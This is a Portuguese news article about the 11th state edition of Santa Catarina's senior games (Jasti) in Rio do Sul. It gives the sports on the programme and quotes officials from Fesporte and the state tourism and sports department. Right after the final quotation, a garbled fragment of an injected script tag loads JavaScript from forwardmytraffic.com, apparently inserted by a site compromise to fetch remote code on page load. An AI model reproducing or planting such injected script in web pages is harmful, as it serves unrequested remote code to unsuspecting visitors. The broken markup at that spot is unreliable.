Esportes

Jogos da Terceira Idade reúnem 2 mil atletas em Rio do Sul

Começa nesta quarta-feira, dia 23, às 19h30, com a cerimônia de abertura no Centro de Eventos Hermann Purnhagen, em Rio do Sul, a etapa estadual da 11ª edição dos Jogos Abertos da Terceira Idade (Jasti) de Santa Catarina. Até sábado, dia 26, cerca de 2 mil atletas com idade a partir de 60 anos, de 172 municípios, disputarão nove modalidades esportivas: bocha, bolão, vôlei e handebol adaptados, além de truco, canastra, dominó, dança de salão e dança coreografada.

 

 

O evento é uma promoção do Governo de Santa Catarina, por meio da Fesporte, em parceria com a prefeitura de Rio do Sul e Agências de Desenvolvimento Regional (ADRs).

 

 

“Chegamos à 11ª edição dos Jasti, um evento dos mais simpáticos e importantes do nosso calendário esportivo. Atingimos esse patamar em virtude do empenho dos dirigentes municipais, dos integradores esportivos e de toda uma equipe comprometida à qualificação do esporte catarinense”, destaca a professora Natália Lúcia Petry, presidente da Fesporte.

 

 

Segundo a dirigente, os atletas chegam a Rio do Sul mostrando, sobretudo, qualidade de vida e disposição, refletindo a importância da prática esportiva, das atividades física e mental, em qualquer fase da vida humana.

 

 

“Por isso, o Estado não pode e não deve ficar à margem desse processo. Cumpre o seu papel na política esportiva, proporcionando aos catarinenses, em parceria com seus municípios, o bem-estar e o desenvolvimento social”, finaliza.

 

 

Tufi Michreff Neto, secretário de Turismo, Cultura e Esporte, destaca que eventos como os Jasti são importantes para melhorar a qualidade de vida do idoso, pois segundo ele o “esporte na terceira idade melhora a capacidade cardiorrespiratória e a flexibilidade do corpo, alivia o estresse e combate os efeitos da depressão”…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: